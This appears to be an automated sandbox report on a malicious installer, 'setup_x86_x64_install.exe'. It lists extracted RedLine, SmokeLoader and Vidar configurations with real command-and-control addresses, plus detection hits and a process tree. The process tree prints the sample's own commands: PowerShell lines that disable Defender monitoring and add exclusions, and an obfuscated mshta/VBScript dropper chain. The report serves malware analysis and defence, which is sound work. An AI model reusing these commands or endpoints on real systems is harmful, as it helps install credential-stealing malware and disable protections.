Resubmissions
02-11-2021 06:54
211102-hpn1zsbhc2 1002-11-2021 06:42
211102-hgpmjsgggp 1001-11-2021 21:47
211101-1ncknsfgfm 10Analysis
-
max time kernel
126s -
max time network
18009s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
02-11-2021 06:54
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20210920
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20211014
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-de-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
4.2MB
-
MD5
b5b5fe52ed9ca7d47bfb857498fd684c
-
SHA1
9c17089a630141c9b4e13ef46ab334d46709fdb8
-
SHA256
6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b
-
SHA512
482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a
Malware Config
Extracted
redline
media0121
91.121.67.60:23325
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral2/memory/2332-225-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/2332-226-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/2332-228-0x0000000000418D26-mapping.dmp family_redline behavioral2/memory/2332-230-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/2332-227-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 5 IoCs
resource yara_rule behavioral2/files/0x000600000001228d-103.dat family_socelars behavioral2/files/0x000600000001228d-124.dat family_socelars behavioral2/files/0x000600000001228d-126.dat family_socelars behavioral2/files/0x000600000001228d-155.dat family_socelars behavioral2/files/0x000600000001228d-156.dat family_socelars -
Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/2088-352-0x0000000001E40000-0x0000000001F16000-memory.dmp family_vidar behavioral2/memory/2088-353-0x0000000000400000-0x00000000004D9000-memory.dmp family_vidar -
XMRig Miner Payload 1 IoCs
resource yara_rule behavioral2/memory/2020-401-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
resource yara_rule behavioral2/files/0x0006000000012237-70.dat aspack_v212_v242 behavioral2/files/0x0006000000012237-71.dat aspack_v212_v242 behavioral2/files/0x0006000000012233-72.dat aspack_v212_v242 behavioral2/files/0x0006000000012233-73.dat aspack_v212_v242 behavioral2/files/0x000600000001224a-76.dat aspack_v212_v242 behavioral2/files/0x000600000001224a-77.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 37 IoCs
pid Process 1284 setup_installer.exe 836 setup_install.exe 1356 Mon178e7a516181.exe 1292 Mon17870faab0.exe 1156 Mon17bffc2992eb3d.exe 1572 Mon175e6c8b40064b8c8.exe 1644 Mon179f74c0ff3cf1f.exe 1948 Mon17afe24e0084db3.exe 1612 Mon1708beae021a5ff.exe 1252 Mon17bbf11fdb575d.exe 1304 Mon17332e41e6b.exe 1828 Mon1727c156c4abcec.exe 1968 Mon1708beae021a5ff.exe 1896 Mon17afe24e0084db3.exe 1228 Mon174a6c5f1664f.exe 1680 Mon178d8e5d06822.exe 1908 Mon17a0d8ec302e.exe 884 Mon17bbf11fdb575d.tmp 1964 Mon17bbf11fdb575d.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2332 Mon174a6c5f1664f.exe 2576 6jZhRtW.EXe 560 GaPxyOFD_78ZdVJvXlwACPtP.exe 1600 LzmwAqmV.exe 1992 inst1.exe 2324 DownFlSetup110.exe 2088 Soft1WW01.exe 2084 chrome.exe 2436 chrome2.exe 2900 search_hyperfs_206.exe 2268 setup.exe 3044 zhanglijuan-game.exe 1748 chrome3.exe 1568 Calculator Installation.exe 2924 Chrome5.exe 2220 7413983.exe 2516 1742005.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Mon178e7a516181.exe Key value queried \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation Mon179f74c0ff3cf1f.exe -
Loads dropped DLL 64 IoCs
pid Process 772 setup_x86_x64_install.exe 1284 setup_installer.exe 1284 setup_installer.exe 1284 setup_installer.exe 1284 setup_installer.exe 1284 setup_installer.exe 1284 setup_installer.exe 836 setup_install.exe 836 setup_install.exe 836 setup_install.exe 836 setup_install.exe 836 setup_install.exe 836 setup_install.exe 836 setup_install.exe 836 setup_install.exe 1836 cmd.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 852 cmd.exe 1760 cmd.exe 1760 cmd.exe 1156 Mon17bffc2992eb3d.exe 1156 Mon17bffc2992eb3d.exe 1748 chrome3.exe 1324 cmd.exe 1292 Mon17870faab0.exe 1292 Mon17870faab0.exe 1644 Mon179f74c0ff3cf1f.exe 1644 Mon179f74c0ff3cf1f.exe 1564 cmd.exe 1564 cmd.exe 1176 cmd.exe 1948 Mon17afe24e0084db3.exe 1948 Mon17afe24e0084db3.exe 1572 Mon175e6c8b40064b8c8.exe 1572 Mon175e6c8b40064b8c8.exe 1940 cmd.exe 1252 Mon17bbf11fdb575d.exe 1252 Mon17bbf11fdb575d.exe 536 cmd.exe 536 cmd.exe 1948 Mon17afe24e0084db3.exe 1828 Mon1727c156c4abcec.exe 1828 Mon1727c156c4abcec.exe 1600 LzmwAqmV.exe 1600 LzmwAqmV.exe 1228 Mon174a6c5f1664f.exe 1228 Mon174a6c5f1664f.exe 1896 Mon17afe24e0084db3.exe 1896 Mon17afe24e0084db3.exe 976 conhost.exe 1092 cmd.exe 1092 cmd.exe 1908 Mon17a0d8ec302e.exe 1908 Mon17a0d8ec302e.exe 1252 Mon17bbf11fdb575d.exe 884 Mon17bbf11fdb575d.tmp 884 Mon17bbf11fdb575d.tmp 884 Mon17bbf11fdb575d.tmp 884 Mon17bbf11fdb575d.tmp 1228 Mon174a6c5f1664f.exe 1356 Mon178e7a516181.exe 2332 Mon174a6c5f1664f.exe 2332 Mon174a6c5f1664f.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 33 ipinfo.io 34 ipinfo.io 60 ipinfo.io -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1228 set thread context of 2332 1228 Mon174a6c5f1664f.exe 70 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 2712 1356 WerFault.exe 36 1932 1644 WerFault.exe 48 1432 1748 WerFault.exe 108 3024 2088 WerFault.exe 95 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2252 schtasks.exe -
Kills process with taskkill 5 IoCs
pid Process 3056 taskkill.exe 3064 taskkill.exe 2396 taskkill.exe 2592 taskkill.exe 2940 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Mon17870faab0.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Mon17870faab0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 chrome2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e chrome2.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1356 Mon178e7a516181.exe 1916 powershell.exe 1992 inst1.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 1908 Mon17a0d8ec302e.exe 1908 Mon17a0d8ec302e.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe 2380 cLiE6MiiLAFB_3mQ1CA4EzDK.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1908 Mon17a0d8ec302e.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeCreateTokenPrivilege 1292 Mon17870faab0.exe Token: SeAssignPrimaryTokenPrivilege 1292 Mon17870faab0.exe Token: SeLockMemoryPrivilege 1292 Mon17870faab0.exe Token: SeIncreaseQuotaPrivilege 1292 Mon17870faab0.exe Token: SeMachineAccountPrivilege 1292 Mon17870faab0.exe Token: SeTcbPrivilege 1292 Mon17870faab0.exe Token: SeSecurityPrivilege 1292 Mon17870faab0.exe Token: SeTakeOwnershipPrivilege 1292 Mon17870faab0.exe Token: SeLoadDriverPrivilege 1292 Mon17870faab0.exe Token: SeSystemProfilePrivilege 1292 Mon17870faab0.exe Token: SeSystemtimePrivilege 1292 Mon17870faab0.exe Token: SeProfSingleProcessPrivilege 1292 Mon17870faab0.exe Token: SeIncBasePriorityPrivilege 1292 Mon17870faab0.exe Token: SeCreatePagefilePrivilege 1292 Mon17870faab0.exe Token: SeCreatePermanentPrivilege 1292 Mon17870faab0.exe Token: SeBackupPrivilege 1292 Mon17870faab0.exe Token: SeRestorePrivilege 1292 Mon17870faab0.exe Token: SeShutdownPrivilege 1292 Mon17870faab0.exe Token: SeDebugPrivilege 1292 Mon17870faab0.exe Token: SeAuditPrivilege 1292 Mon17870faab0.exe Token: SeSystemEnvironmentPrivilege 1292 Mon17870faab0.exe Token: SeChangeNotifyPrivilege 1292 Mon17870faab0.exe Token: SeRemoteShutdownPrivilege 1292 Mon17870faab0.exe Token: SeUndockPrivilege 1292 Mon17870faab0.exe Token: SeSyncAgentPrivilege 1292 Mon17870faab0.exe Token: SeEnableDelegationPrivilege 1292 Mon17870faab0.exe Token: SeManageVolumePrivilege 1292 Mon17870faab0.exe Token: SeImpersonatePrivilege 1292 Mon17870faab0.exe Token: SeCreateGlobalPrivilege 1292 Mon17870faab0.exe Token: 31 1292 Mon17870faab0.exe Token: 32 1292 Mon17870faab0.exe Token: 33 1292 Mon17870faab0.exe Token: 34 1292 Mon17870faab0.exe Token: 35 1292 Mon17870faab0.exe Token: SeDebugPrivilege 1916 powershell.exe Token: SeDebugPrivilege 1992 inst1.exe Token: SeDebugPrivilege 2396 taskkill.exe Token: SeDebugPrivilege 2592 taskkill.exe Token: SeDebugPrivilege 1680 Mon178d8e5d06822.exe Token: SeDebugPrivilege 2712 WerFault.exe Token: SeDebugPrivilege 2940 taskkill.exe Token: SeShutdownPrivilege 1376 Process not Found Token: SeDebugPrivilege 2436 chrome2.exe Token: SeDebugPrivilege 2324 DownFlSetup110.exe Token: SeDebugPrivilege 1748 chrome3.exe Token: SeShutdownPrivilege 1376 Process not Found Token: SeShutdownPrivilege 1376 Process not Found Token: SeDebugPrivilege 1932 WerFault.exe Token: SeShutdownPrivilege 1376 Process not Found -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1376 Process not Found 1376 Process not Found 1376 Process not Found 1376 Process not Found -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1376 Process not Found 1376 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 772 wrote to memory of 1284 772 setup_x86_x64_install.exe 28 PID 772 wrote to memory of 1284 772 setup_x86_x64_install.exe 28 PID 772 wrote to memory of 1284 772 setup_x86_x64_install.exe 28 PID 772 wrote to memory of 1284 772 setup_x86_x64_install.exe 28 PID 772 wrote to memory of 1284 772 setup_x86_x64_install.exe 28 PID 772 wrote to memory of 1284 772 setup_x86_x64_install.exe 28 PID 772 wrote to memory of 1284 772 setup_x86_x64_install.exe 28 PID 1284 wrote to memory of 836 1284 setup_installer.exe 29 PID 1284 wrote to memory of 836 1284 setup_installer.exe 29 PID 1284 wrote to memory of 836 1284 setup_installer.exe 29 PID 1284 wrote to memory of 836 1284 setup_installer.exe 29 PID 1284 wrote to memory of 836 1284 setup_installer.exe 29 PID 1284 wrote to memory of 836 1284 setup_installer.exe 29 PID 1284 wrote to memory of 836 1284 setup_installer.exe 29 PID 836 wrote to memory of 556 836 setup_install.exe 31 PID 836 wrote to memory of 556 836 setup_install.exe 31 PID 836 wrote to memory of 556 836 setup_install.exe 31 PID 836 wrote to memory of 556 836 setup_install.exe 31 PID 836 wrote to memory of 556 836 setup_install.exe 31 PID 836 wrote to memory of 556 836 setup_install.exe 31 PID 836 wrote to memory of 556 836 setup_install.exe 31 PID 836 wrote to memory of 1508 836 setup_install.exe 32 PID 836 wrote to memory of 1508 836 setup_install.exe 32 PID 836 wrote to memory of 1508 836 setup_install.exe 32 PID 836 wrote to memory of 1508 836 setup_install.exe 32 PID 836 wrote to memory of 1508 836 setup_install.exe 32 PID 836 wrote to memory of 1508 836 setup_install.exe 32 PID 836 wrote to memory of 1508 836 setup_install.exe 32 PID 836 wrote to memory of 852 836 setup_install.exe 33 PID 836 wrote to memory of 852 836 setup_install.exe 33 PID 836 wrote to memory of 852 836 setup_install.exe 33 PID 836 wrote to memory of 852 836 setup_install.exe 33 PID 836 wrote to memory of 852 836 setup_install.exe 33 PID 836 wrote to memory of 852 836 setup_install.exe 33 PID 836 wrote to memory of 852 836 setup_install.exe 33 PID 836 wrote to memory of 1836 836 setup_install.exe 34 PID 836 wrote to memory of 1836 836 setup_install.exe 34 PID 836 wrote to memory of 1836 836 setup_install.exe 34 PID 836 wrote to memory of 1836 836 setup_install.exe 34 PID 836 wrote to memory of 1836 836 setup_install.exe 34 PID 836 wrote to memory of 1836 836 setup_install.exe 34 PID 836 wrote to memory of 1836 836 setup_install.exe 34 PID 836 wrote to memory of 1748 836 setup_install.exe 35 PID 836 wrote to memory of 1748 836 setup_install.exe 35 PID 836 wrote to memory of 1748 836 setup_install.exe 35 PID 836 wrote to memory of 1748 836 setup_install.exe 35 PID 836 wrote to memory of 1748 836 setup_install.exe 35 PID 836 wrote to memory of 1748 836 setup_install.exe 35 PID 836 wrote to memory of 1748 836 setup_install.exe 35 PID 836 wrote to memory of 1760 836 setup_install.exe 41 PID 836 wrote to memory of 1760 836 setup_install.exe 41 PID 836 wrote to memory of 1760 836 setup_install.exe 41 PID 836 wrote to memory of 1760 836 setup_install.exe 41 PID 836 wrote to memory of 1760 836 setup_install.exe 41 PID 836 wrote to memory of 1760 836 setup_install.exe 41 PID 836 wrote to memory of 1760 836 setup_install.exe 41 PID 1836 wrote to memory of 1356 1836 cmd.exe 36 PID 1836 wrote to memory of 1356 1836 cmd.exe 36 PID 1836 wrote to memory of 1356 1836 cmd.exe 36 PID 1836 wrote to memory of 1356 1836 cmd.exe 36 PID 1836 wrote to memory of 1356 1836 cmd.exe 36 PID 1836 wrote to memory of 1356 1836 cmd.exe 36 PID 1836 wrote to memory of 1356 1836 cmd.exe 36 PID 836 wrote to memory of 1212 836 setup_install.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1284 -
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:556
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1508
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17870faab0.exe4⤵
- Loads dropped DLL
PID:852 -
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon17870faab0.exeMon17870faab0.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1292 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2892
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178e7a516181.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon178e7a516181.exeMon178e7a516181.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1356 -
C:\Users\Admin\Pictures\Adobe Films\cLiE6MiiLAFB_3mQ1CA4EzDK.exe"C:\Users\Admin\Pictures\Adobe Films\cLiE6MiiLAFB_3mQ1CA4EzDK.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2380
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1356 -s 15566⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe4⤵PID:1748
-
C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon175e6c8b40064b8c8.exeMon175e6c8b40064b8c8.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1572 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))6⤵PID:2112
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS4051E9E5\Mon175e6c8b40064b8c8.exe") do taskkill -Im "%~NxU" -f7⤵PID:2500
-
